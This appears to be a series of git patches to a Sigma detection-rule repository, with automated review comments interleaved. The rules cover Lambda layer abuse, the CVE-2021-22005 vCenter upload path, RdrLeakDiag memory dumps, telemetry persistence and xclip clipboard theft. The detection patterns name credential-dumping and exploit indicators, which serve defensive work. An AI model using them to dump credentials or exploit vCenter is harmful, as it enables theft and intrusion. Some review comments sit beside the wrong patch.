changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From b9123422b8d0f97ae08833bef34e6448ad5088fe Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:37:34 -0500 Subject: [PATCH 1090/1367] Delete aws_attached_malicious_lambda_layer.yml --- .../aws_attached_malicious_lambda_layer.yml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml deleted file mode 100644 index a57e61df..00000000 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ /dev/null 
@@ -1,21 +0,0 @@ -title: AWS Attached Malicious Lambda Layer -id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d -description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. -author: Austin Songer -status: experimental -date: 2021/09/23 -references: - - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html -logsource: - service: cloudtrail -detection: - selection: - eventSource: lambda.amazonaws.com - eventName: UpdateFunctionConfiguration - condition: selection -level: low -tags: - - attack.privilege_escalation -falsepositives: - - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From fdc45505e009654b00d4a3d7c801dac3fc5ed14c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 23 Sep 2021 08:38:02 -0500 Subject: [PATCH 1091/1367] Create aws_attached_malicious_lambda_layer.yml --- .../aws_attached_malicious_lambda_layer.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml new file mode 100644 index 00000000..a57e61df --- /dev/null +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml 
@@ -0,0 +1,21 @@
+title: AWS Attached Malicious Lambda Layer
+id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d
+description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
+author: Austin Songer
+status: experimental
+date: 2021/09/23
+references:
+ - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html
+logsource:
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: lambda.amazonaws.com
+ eventName: UpdateFunctionConfiguration
+ condition: selection
+level: low
+tags:
+ - attack.privilege_escalation
+falsepositives:
+ - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 8203a2d5f2f1736d3471bee9f48e4ed51cad35e3 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Thu, 23 Sep 2021 08:40:26 -0500
Subject: [PATCH 1092/1367] Update aws_attached_malicious_lambda_layer.yml
---
 rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml
index a57e61df..39c92d70 100644
--- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml
+++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml
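Review bot: The selection matches every `eventName: UpdateFunctionConfiguration` call, which CloudTrail also records for memory, timeout, handler and environment-variable changes, so the rule fires on far more than the layer attachment its title and description describe. If the `layers` request parameter appears under `requestParameters` in your sample events, narrowing on it would make the logic match the title (constructed example, confirm the exact key: `requestParameters.layers|contains: 'arn:aws:lambda:'`); otherwise the over-match should at least be stated in `falsepositives`. The description's `Detects when an user attached` reads better as `Detects when a user attaches`. The identical file is created in patch 1089, deleted in 1090 and re-created here, and the 1092 hunk below only touches the `id` line, so this one note covers all of them.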
@@ -1,5 +1,5 @@
 title: AWS Attached Malicious Lambda Layer
-id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d
+id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d
 description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
 author: Austin Songer
 status: experimental
From bf1a8c24150f3753aff489152d7d51795eb90b8d Mon Sep 17 00:00:00 2001
From: Steven
Date: Thu, 23 Sep 2021 18:56:29 +0200
Subject: [PATCH 1093/1367] Fix yamllint
---
 tools/config/auditbeat.yml | 465 ++++++++++++++++++-------------------
 1 file changed, 232 insertions(+), 233 deletions(-)
diff --git a/tools/config/auditbeat.yml b/tools/config/auditbeat.yml
index ae3e7788..9251d711 100644
--- a/tools/config/auditbeat.yml
+++ b/tools/config/auditbeat.yml
@@ -1,4 +1,4 @@
-title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules
+title: Elastic Auditbeat (from 7.x) index pattern and field mapping
 order: 20
 backends:
 - es-qs
@@ -14,239 +14,238 @@ backends: - ee-outliers logsources: - linux_auditd: - product: linux - service: auditd - conditions: - event.provider: auditd + linux_auditd: + product: linux + service: auditd + conditions: + event.provider: auditd defaultindex: auditbeat-* - + fieldmappings: # https://www.elastic.co/guide/en/beats/auditbeat/current/exported-fields-auditd.html - a0: auditd.data.a0 - a1: auditd.data.a1 - a2: auditd.data.a2 - a3: auditd.data.a3 - acct: auditd.data.acct - acl: auditd.data.acl - action: auditd.data.action - added: auditd.data.added - addr: auditd.data.socket.addr - apparmor: auditd.data.apparmor - arch: auditd.data.arch - argc: auditd.data.argc - audit_backlog_limit: auditd.data.audit_backlog_limit - audit_backlog_wait_time: auditd.data.audit_backlog_wait_time - audit_enabled: auditd.data.audit_enabled - audit_failure: auditd.data.audit_failure - auid: user.auid - banners: auditd.data.banners - bool: auditd.data.bool - bus: auditd.data.bus - capability: auditd.data.capability - cap_fe: auditd.data.cap_fe - cap_fi: auditd.data.cap_fi - cap_fp: auditd.data.cap_fp - cap_fver: auditd.data.cap_fver - cap_pa: auditd.data.cap_pa - cap_pe: auditd.data.cap_pe - cap_pi: auditd.data.cap_pi - cap_pp: auditd.data.cap_pp - category: user.selinux.category - cgroup: auditd.data.cgroup - changed: auditd.data.changed - cipher: auditd.data.cipher - class: auditd.data.class - cmd: auditd.data.cmd - code: auditd.data.code - comm: auditd.data.comm - compat: auditd.data.compat - cwd: process.cwd - daddr: auditd.data.daddr - data: auditd.data.data - default-context: auditd.data.default-context - dev: auditd.paths.dev - device: auditd.data.device - dir: auditd.data.dir - direction: auditd.data.direction - dmac: auditd.data.dmac - dport: auditd.data.dport - enforcing: auditd.data.enforcing - entries: auditd.data.entries - exe: process.executable - exit: auditd.data.exit - fam: auditd.data.fam - family: auditd.data.family - fd: auditd.data.fd - file: auditd.data.file - 
flags: auditd.data.flags - fe: auditd.data.fe - feature: auditd.data.feature - fi: auditd.data.fi - fp: auditd.data.fp - format: auditd.data.format - fsgid: user.fsgid - fsuid: user.fsuid - fver: auditd.data.fver - gid: user.gid - grantors: auditd.data.grantors - grp: auditd.data.grp - hook: auditd.data.hook - hostname: auditd.data.hostname - icmp_type: auditd.data.icmp_type - id: auditd.data.id - igid: auditd.data.igid - Image: - img-ctx: auditd.data.img-ctx - inif: auditd.data.inif - ip: auditd.data.ip - ipid: auditd.data.ipid - ino: auditd.data.ino - inode: auditd.paths.inode - inode_gid: auditd.data.inode_gid - inode_uid: auditd.data.inode_uid - invalid_context: auditd.data.invalid_context - ioctlcmd: auditd.data.ioctlcmd - ipx-net: auditd.data.ipx-net - item: auditd.paths.item - items: auditd.data.items - iuid: auditd.data.iuid - kernel: auditd.data.kernel - kind: auditd.data.kind - ksize: auditd.data.ksize - laddr: auditd.data.laddr - len: auditd.data.len - lport: auditd.data.lport - list: auditd.data.list - mac: auditd.data.mac - macproto: auditd.data.macproto - maj: auditd.data.maj - major: auditd.data.major - minor: auditd.data.minor - mode: auditd.paths.mode - model: auditd.data.model - msg: auditd.data.msg - nargs: auditd.data.nargs - name: auditd.paths.name - nametype: auditd.paths.nametype - net: auditd.data.net - new: auditd.data.new - new-chardev: auditd.data.new-chardev - new-disk: auditd.data.new-disk - new-enabled: auditd.data.new-enabled - new-fs: auditd.data.new-fs - new_gid: auditd.data.new_gid - new-level: auditd.data.new-level - new_lock: auditd.data.new_lock - new-log_passwd: auditd.data.new-log_passwd - new-mem: auditd.data.new-mem - new-net: auditd.data.new-net - new_pe: auditd.data.new_pe - new_pi: auditd.data.new_pi - new_pp: auditd.data.new_pp - new-range: auditd.data.new-range - new-rng: auditd.data.new-rng - new-role: auditd.data.new-role - new-seuser: auditd.data.new-seuser - new-vcpu: auditd.data.new-vcpu - nlnk-fam: 
auditd.data.nlnk-fam - nlnk-grp: auditd.data.nlnk-grp - nlnk-pid: auditd.data.nlnk-pid - oauid: auditd.data.oauid - obj: auditd.data.obj - obj_gid: auditd.data.obj_gid - obj_uid: auditd.data.obj_uid - oflag: auditd.data.oflag - ogid: auditd.paths.ogid - ocomm: auditd.data.ocomm - old: auditd.data.old - old-auid: auditd.data.old-auid - old-chardev: auditd.data.old-chardev - old-disk: auditd.data.old-disk - old-enabled: auditd.data.old-enabled - old_enforcing: auditd.data.old_enforcing - old-fs: auditd.data.old-fs - old-level: auditd.data.old-level - old_lock: auditd.data.old_lock - old-log_passwd: auditd.data.old-log_passwd - old-mem: auditd.data.old-mem - old-net: auditd.data.old-net - old_pa: auditd.data.old_pa - old_pe: auditd.data.old_pe - old_pi: auditd.data.old_pi - old_pp: auditd.data.old_pp - old_prom: auditd.data.old_prom - old-range: auditd.data.old-range - old-rng: auditd.data.old-rng - old-role: auditd.data.old-role - old-ses: auditd.data.old-ses - old-seuser: auditd.data.old-seuser - old_val: auditd.data.old_val - old-vcpu: auditd.data.old-vcpu - op: auditd.data.op - opid: auditd.data.opid - oses: auditd.data.oses - ouid: auditd.paths.ouid - outif: auditd.data.outif - parent: auditd.data.parent - path: source.path - per: auditd.data.per - perm: auditd.data.perm - perm_mask: auditd.data.perm_mask - permissive: auditd.data.permissive - pfs: auditd.data.pfs - printer: auditd.data.printer - prom: auditd.data.prom - proctitle: proctitle - proto: auditd.data.proto - qbytes: auditd.data.qbytes - range: auditd.data.range - rdev: auditd.paths.rdev - reason: auditd.data.reason - removed: auditd.data.removed - res: auditd.data.res - resrc: auditd.data.resrc - result: auditd.result - role: user.selinux.role - rport: auditd.data.rport - saddr: auditd.data.socket.saddr - sauid: auditd.data.sauid - scontext: auditd.data.scontext - selected-context: auditd.data.selected-context - seperm: auditd.data.seperm - seqno: auditd.data.seqno - seperms: auditd.data.seperms - 
seresult: auditd.data.seresult - ses: auditd.data.ses - seuser: auditd.data.seuser - sgid: user.sgid - sig: auditd.data.sig - sigev_signo: auditd.data.sigev_signo - smac: auditd.data.smac - spid: auditd.data.spid - sport: auditd.data.sport - state: auditd.data.state - subj: auditd.data.subj - success: auditd.data.success - suid: user.suid - syscall: auditd.data.syscall - table: auditd.data.table - TargetFileName: auditd.data.file - tclass: auditd.data.tclass - tcontext: auditd.data.tcontext - terminal: auditd.data.terminal - tty: auditd.data.tty - type: user.selinux.domain - uid: user.uid - unit: auditd.data.unit - uri: auditd.data.uri - user: user.selinux.user - uuid: auditd.data.uuid - val: auditd.data.val - ver: auditd.data.ver - virt: auditd.data.virt - vm: auditd.data.vm - vm-ctx: auditd.data.vm-ctx - vm-pid: auditd.data.vm-pid - watch: auditd.data.watch + a0: auditd.data.a0 + a1: auditd.data.a1 + a2: auditd.data.a2 + a3: auditd.data.a3 + acct: auditd.data.acct + acl: auditd.data.acl + action: auditd.data.action + added: auditd.data.added + addr: auditd.data.socket.addr + apparmor: auditd.data.apparmor + arch: auditd.data.arch + argc: auditd.data.argc + audit_backlog_limit: auditd.data.audit_backlog_limit + audit_backlog_wait_time: auditd.data.audit_backlog_wait_time + audit_enabled: auditd.data.audit_enabled + audit_failure: auditd.data.audit_failure + auid: user.auid + banners: auditd.data.banners + bool: auditd.data.bool + bus: auditd.data.bus + capability: auditd.data.capability + cap_fe: auditd.data.cap_fe + cap_fi: auditd.data.cap_fi + cap_fp: auditd.data.cap_fp + cap_fver: auditd.data.cap_fver + cap_pa: auditd.data.cap_pa + cap_pe: auditd.data.cap_pe + cap_pi: auditd.data.cap_pi + cap_pp: auditd.data.cap_pp + category: user.selinux.category + cgroup: auditd.data.cgroup + changed: auditd.data.changed + cipher: auditd.data.cipher + class: auditd.data.class + cmd: auditd.data.cmd + code: auditd.data.code + comm: auditd.data.comm + compat: 
auditd.data.compat + cwd: process.cwd + daddr: auditd.data.daddr + data: auditd.data.data + default-context: auditd.data.default-context + dev: auditd.paths.dev + device: auditd.data.device + dir: auditd.data.dir + direction: auditd.data.direction + dmac: auditd.data.dmac + dport: auditd.data.dport + enforcing: auditd.data.enforcing + entries: auditd.data.entries + exe: process.executable + exit: auditd.data.exit + fam: auditd.data.fam + family: auditd.data.family + fd: auditd.data.fd + file: auditd.data.file + flags: auditd.data.flags + fe: auditd.data.fe + feature: auditd.data.feature + fi: auditd.data.fi + fp: auditd.data.fp + format: auditd.data.format + fsgid: user.fsgid + fsuid: user.fsuid + fver: auditd.data.fver + gid: user.gid + grantors: auditd.data.grantors + grp: auditd.data.grp + hook: auditd.data.hook + hostname: auditd.data.hostname + icmp_type: auditd.data.icmp_type + id: auditd.data.id + igid: auditd.data.igid + img-ctx: auditd.data.img-ctx + inif: auditd.data.inif + ip: auditd.data.ip + ipid: auditd.data.ipid + ino: auditd.data.ino + inode: auditd.paths.inode + inode_gid: auditd.data.inode_gid + inode_uid: auditd.data.inode_uid + invalid_context: auditd.data.invalid_context + ioctlcmd: auditd.data.ioctlcmd + ipx-net: auditd.data.ipx-net + item: auditd.paths.item + items: auditd.data.items + iuid: auditd.data.iuid + kernel: auditd.data.kernel + kind: auditd.data.kind + ksize: auditd.data.ksize + laddr: auditd.data.laddr + len: auditd.data.len + lport: auditd.data.lport + list: auditd.data.list + mac: auditd.data.mac + macproto: auditd.data.macproto + maj: auditd.data.maj + major: auditd.data.major + minor: auditd.data.minor + mode: auditd.paths.mode + model: auditd.data.model + msg: auditd.data.msg + nargs: auditd.data.nargs + name: auditd.paths.name + nametype: auditd.paths.nametype + net: auditd.data.net + new: auditd.data.new + new-chardev: auditd.data.new-chardev + new-disk: auditd.data.new-disk + new-enabled: auditd.data.new-enabled + new-fs: 
auditd.data.new-fs + new_gid: auditd.data.new_gid + new-level: auditd.data.new-level + new_lock: auditd.data.new_lock + new-log_passwd: auditd.data.new-log_passwd + new-mem: auditd.data.new-mem + new-net: auditd.data.new-net + new_pe: auditd.data.new_pe + new_pi: auditd.data.new_pi + new_pp: auditd.data.new_pp + new-range: auditd.data.new-range + new-rng: auditd.data.new-rng + new-role: auditd.data.new-role + new-seuser: auditd.data.new-seuser + new-vcpu: auditd.data.new-vcpu + nlnk-fam: auditd.data.nlnk-fam + nlnk-grp: auditd.data.nlnk-grp + nlnk-pid: auditd.data.nlnk-pid + oauid: auditd.data.oauid + obj: auditd.data.obj + obj_gid: auditd.data.obj_gid + obj_uid: auditd.data.obj_uid + oflag: auditd.data.oflag + ogid: auditd.paths.ogid + ocomm: auditd.data.ocomm + old: auditd.data.old + old-auid: auditd.data.old-auid + old-chardev: auditd.data.old-chardev + old-disk: auditd.data.old-disk + old-enabled: auditd.data.old-enabled + old_enforcing: auditd.data.old_enforcing + old-fs: auditd.data.old-fs + old-level: auditd.data.old-level + old_lock: auditd.data.old_lock + old-log_passwd: auditd.data.old-log_passwd + old-mem: auditd.data.old-mem + old-net: auditd.data.old-net + old_pa: auditd.data.old_pa + old_pe: auditd.data.old_pe + old_pi: auditd.data.old_pi + old_pp: auditd.data.old_pp + old_prom: auditd.data.old_prom + old-range: auditd.data.old-range + old-rng: auditd.data.old-rng + old-role: auditd.data.old-role + old-ses: auditd.data.old-ses + old-seuser: auditd.data.old-seuser + old_val: auditd.data.old_val + old-vcpu: auditd.data.old-vcpu + op: auditd.data.op + opid: auditd.data.opid + oses: auditd.data.oses + ouid: auditd.paths.ouid + outif: auditd.data.outif + parent: auditd.data.parent + path: source.path + per: auditd.data.per + perm: auditd.data.perm + perm_mask: auditd.data.perm_mask + permissive: auditd.data.permissive + pfs: auditd.data.pfs + printer: auditd.data.printer + prom: auditd.data.prom + proctitle: proctitle + proto: auditd.data.proto + qbytes: 
auditd.data.qbytes + range: auditd.data.range + rdev: auditd.paths.rdev + reason: auditd.data.reason + removed: auditd.data.removed + res: auditd.data.res + resrc: auditd.data.resrc + result: auditd.result + role: user.selinux.role + rport: auditd.data.rport + saddr: auditd.data.socket.saddr + sauid: auditd.data.sauid + scontext: auditd.data.scontext + selected-context: auditd.data.selected-context + seperm: auditd.data.seperm + seqno: auditd.data.seqno + seperms: auditd.data.seperms + seresult: auditd.data.seresult + ses: auditd.data.ses + seuser: auditd.data.seuser + sgid: user.sgid + sig: auditd.data.sig + sigev_signo: auditd.data.sigev_signo + smac: auditd.data.smac + spid: auditd.data.spid + sport: auditd.data.sport + state: auditd.data.state + subj: auditd.data.subj + success: auditd.data.success + suid: user.suid + syscall: auditd.data.syscall + table: auditd.data.table + TargetFileName: auditd.data.file + tclass: auditd.data.tclass + tcontext: auditd.data.tcontext + terminal: auditd.data.terminal + tty: auditd.data.tty + type: user.selinux.domain + uid: user.uid + unit: auditd.data.unit + uri: auditd.data.uri + user: user.selinux.user + uuid: auditd.data.uuid + val: auditd.data.val + ver: auditd.data.ver + ssvirt: auditd.data.virt + vm: auditd.data.vm + vm-ctx: auditd.data.vm-ctx + vm-pid: auditd.data.vm-pid + watch: auditd.data.watch From 9cb826b0d158c7647b0a27a4edcced844b28b3be Mon Sep 17 00:00:00 2001 From: Steven Date: Fri, 24 Sep 2021 09:00:26 +0200 Subject: [PATCH 1094/1367] Rename auditbeat.yml to ecs-auditbeat-modules-enabled.yml --- tools/config/{auditbeat.yml => ecs-auditbeat-modules-enabled.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tools/config/{auditbeat.yml => ecs-auditbeat-modules-enabled.yml} (100%) diff --git a/tools/config/auditbeat.yml b/tools/config/ecs-auditbeat-modules-enabled.yml similarity index 100% rename from tools/config/auditbeat.yml rename to tools/config/ecs-auditbeat-modules-enabled.yml 
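Review bot: The last mapping in the hunk, `+ ssvirt: auditd.data.virt`, replaces `virt: auditd.data.virt` and looks like a stray keystroke rather than an intended rename; any rule using the `virt` field is now left unmapped. The line should stay `virt: auditd.data.virt`. The hunk also drops the valueless `Image:` entry from the old list, which changes how `Image` resolves for rules converted with this config; that may be part of the lint fix, but it is not covered by the subject "Fix yamllint" and is worth confirming.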
From ef756956477ce591d3b136358e69fd5618266a39 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:39:56 +0200 Subject: [PATCH 1095/1367] convert re to endswith --- ...busing_windows_telemetry_for_persistence.yml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml index 459fc153..ecf8aba9 100644 --- a/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml @@ -11,7 +11,7 @@ tags: - attack.t1053 author: Sreeman date: 2020/09/29 -modified: 2021/09/09 +modified: 2021/09/24 fields: - EventID - CommandLine @@ -23,7 +23,20 @@ logsource: detection: selection: TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\' - Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' + Details|endswith: + - .sh + - .exe + - .dll + - .bin + - .bat + - .cmd + - .js + - .ps + - .vb + - .jar + - .hta + - .msi + - .vbs condition: selection falsepositives: - none From 16452ca80ee078b7ca25aba17e7b7229159b62a2 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 24 Sep 2021 21:21:09 +0700 Subject: [PATCH 1096/1367] Create web_cve_2021_22005_vmware_file_upload --- .../web/web_cve_2021_22005_vmware_file_upload | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/web/web_cve_2021_22005_vmware_file_upload diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload b/rules/web/web_cve_2021_22005_vmware_file_upload new file mode 100644 index 00000000..b09ba195 --- /dev/null +++ b/rules/web/web_cve_2021_22005_vmware_file_upload 
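Review bot: In the second hunk the new `Details|endswith` list carries `.ps` and `.vb`, which are not extensions Windows executes directly — PowerShell scripts end in `.ps1`, which this list does not match, and `.vbs` is already listed separately; the original regex had the same gap, and the conversion was the moment to close it, e.g. `- .ps1` in place of `- .ps`. The values are unquoted while the `TargetObject|contains` value above is quoted; writing them as `- '.sh'` keeps the file's own style.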
@@ -0,0 +1,23 @@ +title: VMware vCenter Server File Upload CVE-2021-22005 +id: b014ea07-8ea0-4859-b517-50a4e5b7ecec +status: experimental +description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server. +author: Sittikorn S +date: 2021/09/24 +references: + - https://kb.vmware.com/s/article/85717 + - https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + cs-method: 'POST' + c-uri|contains: + - '/analytics/telemetry/ph/api/hyper/send?' + condition: selection +falsepositives: +- Vulnerability Scanning/Pentesting +level: high From f903640b73b51beae006958e05690dbf51056f85 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 24 Sep 2021 21:29:43 +0700 Subject: [PATCH 1097/1367] Update web_cve_2021_22005_vmware_file_upload --- rules/web/web_cve_2021_22005_vmware_file_upload | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload b/rules/web/web_cve_2021_22005_vmware_file_upload index b09ba195..c788d1da 100644 --- a/rules/web/web_cve_2021_22005_vmware_file_upload +++ b/rules/web/web_cve_2021_22005_vmware_file_upload @@ -11,13 +11,13 @@ tags: - attack.initial_access - attack.t1190 logsource: - category: webserver + category: webserver detection: selection: cs-method: 'POST' c-uri|contains: - '/analytics/telemetry/ph/api/hyper/send?' - condition: selection + condition: selection falsepositives: -- Vulnerability Scanning/Pentesting + - Vulnerability Scanning/Pentesting level: high From dea89ad324816ac4fd033353a1dd77ad669594a3 Mon Sep 17 00:00:00 2001 
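Review bot: The `c-uri|contains` value `/analytics/telemetry/ph/api/hyper/send?` ends in `?`, which Sigma treats as a single-character wildcard rather than the literal query delimiter, so backends emit a wildcard pattern and the intent is not obvious to a reader; either escape it as `send\?` or drop it, since `contains` already matches the path prefix. The same value is carried unchanged into the PATCH 1108 hunk. The description spells the vendor `VMWare` where the title uses `VMware`.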
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 24 Sep 2021 21:35:04 +0700 Subject: [PATCH 1098/1367] Update and rename web_cve_2021_22005_vmware_file_upload to web_cve_2021_22005_vmware_file_upload.yml --- ...ware_file_upload => web_cve_2021_22005_vmware_file_upload.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve_2021_22005_vmware_file_upload => web_cve_2021_22005_vmware_file_upload.yml} (100%) diff --git a/rules/web/web_cve_2021_22005_vmware_file_upload b/rules/web/web_cve_2021_22005_vmware_file_upload.yml similarity index 100% rename from rules/web/web_cve_2021_22005_vmware_file_upload rename to rules/web/web_cve_2021_22005_vmware_file_upload.yml From ecd4719a200dd52b091570046fc9ee343bc3a414 Mon Sep 17 00:00:00 2001 From: kidrek Date: Fri, 24 Sep 2021 18:22:06 +0200 Subject: [PATCH 1099/1367] add new rule win_process_dump_rdrleakdiag --- .../win_process_dump_rdrleakdiag.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/win_process_dump_rdrleakdiag.yml diff --git a/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml new file mode 100644 index 00000000..22f2284c --- /dev/null +++ b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml @@ -0,0 +1,22 @@ +title: Process Dump via RdrLeakDiag.exe +id: EDADB1E5-5919-4E4C-8462-A9E643B02C4B +description: Detects a process memory dump performed by RdrLeakDiag.exe +status: experimental +level: high +references: + - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ +author: Cedric MAURUGEON +date: 2021/09/24 +tags: + - attack.credential_access + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: RdrLeakDiag.exe + CommandLine|contains: + - 'fullmemdmp' + condition: selection +falsepositives: Unknown 
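Review bot: The selection keys only on `OriginalFileName`, which Sysmon event 1 provides but Windows Security 4688 process-creation events do not, so on a 4688-backed `process_creation` source the rule can never match; accepting the image path as an alternative keeps coverage across both sources. The `level: high` line sits between `status` and `references` rather than at the end of the rule where the other new rules in this series place it. A split of the selection into an image part and a command-line part is shown below.
```yaml
detection:
  selection_img:
    - OriginalFileName: RdrLeakDiag.exe
    - Image|endswith: '\rdrleakdiag.exe'
  selection_cli:
    CommandLine|contains: fullmemdmp
  condition: selection_img and selection_cli
```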
From 4bbe4962b01b5b2bffd02edf3659cd670dc9ddef Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Fri, 24 Sep 2021 18:40:10 +0200 Subject: [PATCH 1100/1367] New Rule - Linux - Auditd - Clipboard Collection --- .../lnx_auditd_clipboard_collection.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_clipboard_collection.yml diff --git a/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml new file mode 100644 index 00000000..4f5f3a00 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml @@ -0,0 +1,27 @@ +title: Clipboard Collection with Xclip Tool +id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf +description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +author: 'Pawel Mazur' +status: experimental +date: 2021/09/24 +references: + - https://attack.mitre.org/techniques/T1115/ + - https://linux.die.net/man/1/xclip + - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ +logsource: + product: linux + service: auditd +detection: + xclip: + type: EXECVE + a0: xclip + a1: '-selection' + a2: clipboard + a3: '-o' + condition: xclip +tags: + - attack.collection + - attack.t1115 +falsepositives: + - Legitimate usage of xclip tools +level: low \ No newline at end of file From 267da517453656a2fa701a48fa2830c3c947836b Mon Sep 17 00:00:00 2001 From: kidrek Date: Fri, 24 Sep 2021 22:18:00 +0200 Subject: [PATCH 1101/1367] The issues have been fixed --- .../process_creation/win_process_dump_rdrleakdiag.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml b/rules/windows/process_creation/win_process_dump_rdrleakdiag.yml index 22f2284c..96687d49 100644 
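Review bot: The `xclip` selection pins each argument to a fixed position (`a1: '-selection'`, `a2: clipboard`, `a3: '-o'`), so an invocation that orders or abbreviates the options differently, which xclip permits, does not match; anchoring on `a0: xclip` and allowing the output switch in any of `a1`..`a3` covers the same behaviour with less brittleness, as sketched below. The file also lacks a trailing newline (`\ No newline at end of file`), which the yamllint fix in PATCH 1093 suggests the repository checks. The description's "Highly recommended using rule on servers" would read better as "Use of this rule is highly recommended on servers".
```yaml
detection:
  selection_xclip:
    type: EXECVE
    a0: xclip
  selection_out:
    - a1: '-o'
    - a2: '-o'
    - a3: '-o'
  condition: selection_xclip and selection_out
```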
